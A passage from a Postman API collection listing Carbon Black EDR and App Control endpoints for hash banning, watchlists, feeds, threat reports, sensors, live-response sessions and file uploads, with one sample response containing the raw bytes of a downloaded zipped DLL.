EDR","type":"folder"}},"urlObject":{"path":["api","v1","banning","blacklist"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"1dbfe899-65f2-4b5b-8aef-4fbb3cfd767c"},{"name":"Ban Binary by Hash","id":"7f098120-c1e8-44c6-b886-e43c5e4fdf86","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"{{cb_url}}/api/v1/banning/blacklist","description":"<p>Blacklist (Ban) a specified md5 hash</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","banning","blacklist"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"7f098120-c1e8-44c6-b886-e43c5e4fdf86"}],"id":"d442e4e4-8e1e-44f9-953f-ff96517733cc","_postman_id":"d442e4e4-8e1e-44f9-953f-ff96517733cc","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}},{"name":"Watchlists & Feeds","item":[{"name":"Get Watchlists","id":"4b104bb7-20bf-4e47-b4fd-0d00a3406c01","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/watchlist/","description":"<p>Watchlist enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#watchlist-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","watchlist",""],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"4b104bb7-20bf-4e47-b4fd-0d00a3406c01"},{"name":"Get Watchlist by ID","id":"efd63564-65bb-4206-8856-78e9c5ad3680","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/watchlist/{{cb_watchlist_id}}","description":"<p>Watchlist enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#watchlist-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","watchlist","{{cb_watchlist_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"efd63564-65bb-4206-8856-78e9c5ad3680"},{"name":"Create Watchlist","id":"49b38aaa-4273-4ca0-9cfd-dfa8308172a6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"{{cb_url}}/api/v1/watchlist","description":"<p>Watchlist enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#watchlist-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","watchlist"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"49b38aaa-4273-4ca0-9cfd-dfa8308172a6"},{"name":"Update Watchlist by ID","id":"da66cdd7-b609-4166-a5c2-c2c4c3c5f4bf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"url":"{{cb_url}}/api/v1/watchlist/{{cb_watchlist_id}}","description":"<p>Watchlist enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#watchlist-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","watchlist","{{cb_watchlist_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"da66cdd7-b609-4166-a5c2-c2c4c3c5f4bf"},{"name":"Delete Watchlist by ID","id":"c40f268c-4a79-4ff7-bd9e-0091612109de","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/api/v1/watchlist/{{cb_watchlist_id}}","description":"<p>Watchlist enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#watchlist-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","watchlist","{{cb_watchlist_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c40f268c-4a79-4ff7-bd9e-0091612109de"},{"name":"Get Feeds","id":"db121c6c-1fe0-46ce-b63f-f49f79f263b8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/feed/","description":"<p>Feed enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#feed-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","feed",""],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"db121c6c-1fe0-46ce-b63f-f49f79f263b8"},{"name":"Get Feed by ID","id":"bc7114a0-030b-4f2c-9ad0-678776282f6a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/feed/{{cb_feed_id}}","description":"<p>Feed enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#feed-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","feed","{{cb_feed_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"bc7114a0-030b-4f2c-9ad0-678776282f6a"},{"name":"Create Feed","id":"b8e1aca2-0adf-4a2f-bd5e-f9530f037675","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"url":"{{cb_url}}/api/v1/feed/","description":"<p>Feed enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#feed-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","feed",""],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"b8e1aca2-0adf-4a2f-bd5e-f9530f037675"},{"name":"Update Feed by ID","id":"16e03b1b-26d1-42b8-bae7-046a3f8547b4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"url":"{{cb_url}}/api/v1/feed/{{cb_feed_id}}","description":"<p>Feed enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#feed-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","feed","{{cb_feed_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"16e03b1b-26d1-42b8-bae7-046a3f8547b4"},{"name":"Delete Feed by ID","id":"9fc47c88-c241-4bf1-a2b2-d563c67c1ca0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/api/v1/feed/{{cb_feed_id}}","description":"<p>Feed enumeration, creation, modification, and deletion</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#feed-operations\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","feed","{{cb_feed_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"9fc47c88-c241-4bf1-a2b2-d563c67c1ca0"}],"id":"79fb4297-089f-40fc-81ed-1f1bb4647e88","_postman_id":"79fb4297-089f-40fc-81ed-1f1bb4647e88","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}},{"name":"Threat Reports","item":[{"name":"Search Threat Reports","id":"39c9122f-0aa1-44fa-8627-566e8788280a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":false},"method":"GET","header":[{"key":"Content-Type","type":"text","value":"application/json"}],"url":"{{cb_url}}/api/v1/threat_report?q=","description":"<p>Each Feed contains zero or more Threat Reports. The Search Threat Report API route allows you to search the content of these threat reports. For more information on creating CB Response Threat Intelligence Feeds, see the <a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/threat-intelligence-feeds/\">Threat Intelligence Feed Reference</a>.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#search-threat-reports\">See Documentation</a></p>\n","urlObject":{"path":["api","v1","threat_report"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>REQUIRED Query string. Accepts the same data as the search box on the Threat Report page</p>\n","type":"text/plain"},"key":"q","value":""},{"disabled":true,"description":{"content":"<p>OPTIONAL Return this many rows, 10 by default</p>\n","type":"text/plain"},"key":"rows","value":""},{"disabled":true,"description":{"content":"<p>OPTIONAL Start at this row, 0 by default</p>\n","type":"text/plain"},"key":"start","value":""},{"disabled":true,"description":{"content":"<p>OPTIONAL Sort rows by this field and order. last_update desc by default</p>\n","type":"text/plain"},"key":"sort","value":""},{"disabled":true,"description":{"content":"<p>OPTIONAL Return facet results. ‘false’ by default, set to ‘true’ for facets</p>\n","type":"text/plain"},"key":"facet","value":""}],"variable":[]}},"response":[],"_postman_id":"39c9122f-0aa1-44fa-8627-566e8788280a"},{"name":"Bulk Modify Threat Reports","id":"78816a9b-675e-4bdb-8aac-f13607ffa662","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"ids\": {\n        \"<feed_id>\": [\"<report_id>\"]\n    },\n    \"query\": \"<url-encoded query string>\",\n    \"updates\": {\n        \"is_ignored\": true\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/v1/threat_report","description":"<p>Modifying threat reports require an API key with Global Administrator privileges. Multiple threat reports can be ignored/enabled in bulk using the same call.</p>\n<p>The only property that can be modified in a threat report is the <code>is_ignored</code> property. By setting <code>is_ignored</code> to <code>True</code> for a threat report, any further hits on IOCs contained within that report will no longer trigger an Alert.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#bulk-modify-threat-reports\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","threat_report"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"78816a9b-675e-4bdb-8aac-f13607ffa662"}],"id":"d68173a2-8869-449c-9484-9cc0d5dfcf10","_postman_id":"d68173a2-8869-449c-9484-9cc0d5dfcf10","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}},{"name":"Sensors/Endpoints","item":[{"name":"Retrieve/Modify Sensor Details","id":"f29d6c92-a0c2-4d41-bdc3-1200f1d51f6e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/sensor/{{cb_device_id}}","description":"<p>Sensor / remote client details</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.1/rest-api/#retrieve-modify-sensor-details\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","sensor","{{cb_device_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"f29d6c92-a0c2-4d41-bdc3-1200f1d51f6e"}],"id":"76818777-4236-4f09-a1b5-ee4e1c51efb4","_postman_id":"76818777-4236-4f09-a1b5-ee4e1c51efb4","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}},{"name":"Live Response","item":[{"name":"View Current Sessions","id":"6705fb74-e42d-4805-a749-2175008fb809","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/v1/cblr/session?active_only=","description":"<p>To view all current sessions, use a <code>GET</code> command to <code>https://{{cb_url}}/api/v1/cblr/session</code>. The following request will retrieve a list of currently active or recently closed sessions. Note: If you just created a session, it might show up as <code>status: pending</code>, this will transition to <code>status: active</code> once the session is ready.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.3/live-response-api/#view-current-sessions\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","cblr","session"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>true / false</p>\n","type":"text/plain"},"key":"active_only","value":""}],"variable":[]}},"response":[],"_postman_id":"6705fb74-e42d-4805-a749-2175008fb809"},{"name":"Start a New Session","id":"9dcf85da-8145-49e8-b3d7-61a1b0d6a9c5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"sensor_id\": {{cb_device_id}}\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/v1/cblr/session","description":"<p>All CBLR activity requires you first start a session with a sensor by <code>POST</code>ing to <code>/api/v1/cblr/</code> session with requested <code>sensor_id</code>. Note: a live response session can be created from the CbR UI as well.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.3/live-response-api/#start-a-new-session\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","cblr","session"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"9dcf85da-8145-49e8-b3d7-61a1b0d6a9c5"},{"name":"Issue Commands","id":"f0bfce39-442d-4859-aeaf-382285257838","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"session_id\": {{cb_lr_session_id}},\n    \"name\": \"process list\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/v1/cblr/session/{{cb_lr_session_id}}/command","description":"<p>Once a session is active, you can create commands by <code>POST</code>ing a command object to the session via <code>/api/v1/cblr/session/2/command</code>. For example, to get a process list:</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.3/live-response-api/#issue-commands\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","cblr","session","{{cb_lr_session_id}}","command"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"f0bfce39-442d-4859-aeaf-382285257838"},{"name":"Close Sessions","id":"5dfdcc1b-6f78-47b0-a2b3-1a904d9f0591","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"status\": \"close\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/v1/cblr/session/{{cb_lr_session_id}}","description":"<p>Once a session is active, you can create commands by <code>POST</code>ing a command object to the session via <code>/api/v1/cblr/session/2/command</code>. For example, to get a process list:</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-response/6.3/live-response-api/#close-sessions\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}},"urlObject":{"path":["api","v1","cblr","session","{{cb_lr_session_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"5dfdcc1b-6f78-47b0-a2b3-1a904d9f0591"}],"id":"ec5a3b4e-045b-44f8-ae32-6ca93bd01c7e","_postman_id":"ec5a3b4e-045b-44f8-ae32-6ca93bd01c7e","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":true,"source":{"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","name":"CB EDR","type":"folder"}}}],"id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_api_token}}"}]},"isInherited":false},"event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"8a6adc3b-d35c-4eac-8516-9c1cb24cff0e"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"1d67670c-10cd-4726-92e9-1184c556b262"}}],"_postman_id":"d2495a00-eea8-4cd5-9474-f380c5e7bbe7","description":""},{"name":"App Control","item":[{"name":"File Upload","id":"76ff4619-2df3-4bb1-9ff2-3ea5cc39fd03","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\r\n    \"computerId\": 1,\r\n    \"fileCatalogId\": 32517\r\n}","options":{"raw":{"language":"json"}}},"url":"{{cbp_url}}/api/v1/fileUpload","description":"<p><code>v1/fileUpload</code> object exposes all uploaded files from the App Control Agents. It also allows requesting or canceling new uploads. Uploaded files can be accessed through the API.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/enterprise-protection/8.0/rest-api/#fileupload\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cbp_token}}"}]},"isInherited":true,"source":{"_postman_id":"ef6af4a7-d963-40ee-b1fb-7f8e700c976a","id":"ef6af4a7-d963-40ee-b1fb-7f8e700c976a","name":"App Control","type":"folder"}},"urlObject":{"path":["api","v1","fileUpload"],"host":["{{cbp_url}}"],"query":[],"variable":[]}},"response":[{"id":"f27bf9e1-99b2-4ec4-908f-2835b337b462","name":"Upload file to server","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\r\n    \"computerId\": 1,\r\n    \"fileCatalogId\": 32517\r\n}","options":{"raw":{"language":"json"}}},"url":"{{cbp_url}}/api/bit9platform/v1/fileUpload"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Cache-Control","value":"no-cache"},{"key":"Pragma","value":"no-cache"},{"key":"Content-Type","value":"application/json; charset=utf-8"},{"key":"Expires","value":"-1"},{"key":"Location","value":"https://cb-appcontrol.vmwtd.com/api/bit9platform/v1/fileUpload/7"},{"key":"Server","value":"Microsoft-IIS/10.0"},{"key":"X-AspNet-Version","value":"4.0.30319"},{"key":"Date","value":"Fri, 02 Apr 2021 19:05:22 GMT"},{"key":"Content-Length","value":"474"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": 7,\n    \"fileCatalogId\": 32517,\n    \"computerId\": 1,\n    \"priority\": 1,\n    \"createdBy\": \"rfortress\",\n    \"dateCreated\": \"2021-04-02T18:35:42.897Z\",\n    \"dateModified\": \"2021-04-02T18:35:46.133Z\",\n    \"fileName\": \"yourphoneappproxy.core.resources.dll\",\n    \"pathName\": \"c:\\\\program files\\\\windowsapps\\\\microsoft.yourphone_1.21022.160.0_x64__8wekyb3d8bbwe\\\\yourphoneappproxy\\\\tk-tm\",\n    \"uploadPath\": \"C:\\\\Program Files (x86)\\\\Bit9\\\\Parity Server\\\\files\\\\7.zip\",\n    \"uploadedFileSize\": 1736,\n    \"uploadStatus\": 3,\n    \"createdByUserId\": 1\n}"},{"id":"6c9f2686-71d7-43c6-8b53-a893d65e914a","name":"Download file from server","originalRequest":{"method":"GET","header":[],"url":{"raw":"{{cbp_url}}/api/bit9platform/v1/fileUpload/{{cbp_file_id}}?downloadFile=true","host":["{{cbp_url}}"],"path":["api","bit9platform","v1","fileUpload","{{cbp_file_id}}"],"query":[{"key":"downloadFile","value":"true"}]}},"status":"OK","code":200,"_postman_previewlanguage":"raw","header":[{"key":"Cache-Control","value":"no-cache"},{"key":"Pragma","value":"no-cache"},{"key":"Content-Length","value":"1736"},{"key":"Content-Type","value":"application/octet-stream"},{"key":"Expires","value":"-1"},{"key":"Server","value":"Microsoft-IIS/10.0"},{"key":"X-AspNet-Version","value":"4.0.30319"},{"key":"Date","value":"Fri, 02 Apr 2021 19:15:06 GMT"}],"cookie":[],"responseTime":null,"body":"PK\u0003\u0004\u0014\u0000\b\b\b\u0000t��R\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u000e\u0000\u0000�\u0000$\u0000program files/windowsapps/microsoft.yourphone_1.21022.160.0_x64__8wekyb3d8bbwe/yourphoneappproxy/tk-tm/yourphoneappproxy.core.resources.dll\n\u0000 \u0000\u0000\u0000\u0000\u0000\u0001\u0000\u0018\u0000\u0000>չ<'�\u0001\u0000>չ<'�\u0001\u0000�A�<'�\u0001�V�o\u001bE\u0014�8�4*j(�C�\u0004�\u0007D�ڊC\u001b��8q?Rbbũ�\"$�^��Uǻ��8���J�J��?��\"*�\u00025\u0007�\u0010Tj\u000f�\u0013��?��\u0003'�Z���ڛڥ�\u0004\u0012�����}���}̛Y�޻\u0006]\u0000\u0010���\u0011�\u001d�i\u0006�N�q\f�|=\u0004�����\u0016�.�Y\u001eq�S�F���m;��(�u�X6�.\u0016H�)S}Ϟ��\u0000#\n�|5\u0006��K�!�6�J\u0006c�\u0000=�����V\u000b�c~�\u0000�;��rI]0s��I3��Q��d'��F���_\"�6�\u000b�!��k�ש�cmSVu�q\u0013��f\u0002���v(��9e�\u0019\bV��P���Y�\u001b�F\u0001~�F�\u0002]��za7t\u000bǃ{[�\u0012�:\u000eVhx���%�9unR���D�2���\u000egVi�\u0014)�,ǞN�Iy���:\u0013uN�mZ\u0017�`�$_/1�|�6���Ԟ.\u001d;fL��o��&�4y|*��n\u000b�FCA��hM��ɘg\u000b�f� �\u0017p�� &�\u0013�))�\u0006&ˌ��'\u0000B�0Q\u0010ܲ����#�/C�|\u0001���=�8s~>+�?��Y�\u0002�h��\u000e\u0003�K�\u001e���~�{�u\u000f��\u0001�\u0015�{�\b�C>��\u0007�o(~]�ۊ��\u001c�sev�p\u0012F�E�\u000f(>��k��\u0014�R\\�A\u0018C�\u000f�D�C�B:$��u�\u0018�\u0004\\E~\u0002����V��4�Mjѭ��\u0000�f,'B�9�\\g�-\b{\u0000�\u000bXa�\u0014�\f��<Z+�Ʋ%\u0018�\b�x�.(�pxS����-WNh���9��\u001av�]����\u0014�y���!�\f\u0016te'\\����Z\u0007��\u0016�m�.`\u000b��\u001c�f\\\u0017]o4�9�Sܨa��\u0019{�\u0011��o,�d�j��5#\u001251\u0002��E�2|z�/�\"{�܌���^ټ\u0006}�?z�x ��\u0017�6��p�ޏ���e����\u0007s����8Ѵ�C\u001a��\u001c\u0004��\u0006\u0007�\u0010�L\u0011\u000ej�R�2��9\u0015AP�:\\\u0015\u001b�D����\u0000i\r�~{�t4�\t�0FT�=�9Q�N�:n5\rzS���'�sj��έW�O�\u000e�ܲ�\u000erI�\u001b�2\u0003p8��\u000f��ȋP�ө\b�`\t��a\u0011���y��Y������\t\u0017��\u000e�$�c�A�*�\"\u0018�\u0011�³�\"�\r\u0015p�~L�ZF��R\u000f�\u0006\b�s�ͧ��K�[W@9G�\r�\u000eH+�&ټ�P�5�<��\u001a̡M\r/��\u0002�~���:��aM���\u0000\\��(s�|n��)gq��PFoLE����窘\u001bX!CaK�ad���pT�\u001b\tp\\ţ٭�ˈ\u0015��᩹\u0016�Fk��XA�}_\u0004���#r\u000b/������>~�4UK�lm��E��]���ßa��h�>���k\u0001�U�E�s\u0011Af]E|���\u0006���먣�`D�\u0003��x�M��9�#/��$��]\fl� ߰^��w^��?��6&F\u0011�ݯqO\u001b��+����q�\u0013\u0019��z�pw0�$�0ǟ���?�7PK\u0007\b�O`��\u0004\u0000\u0000\u0000\u000e\u0000\u0000PK\u0001\u00023\n\u0014\u0000\b\b\b\u0000t��R�O`��\u0004\u0000\u0000\u0000\u000e\u0000\u0000�\u0000L\u0000\u0000\u0000\u0000\u0000\u0000\u0000 \u0000\u0000\u0000\u0000\u0000\u0000\u0000program 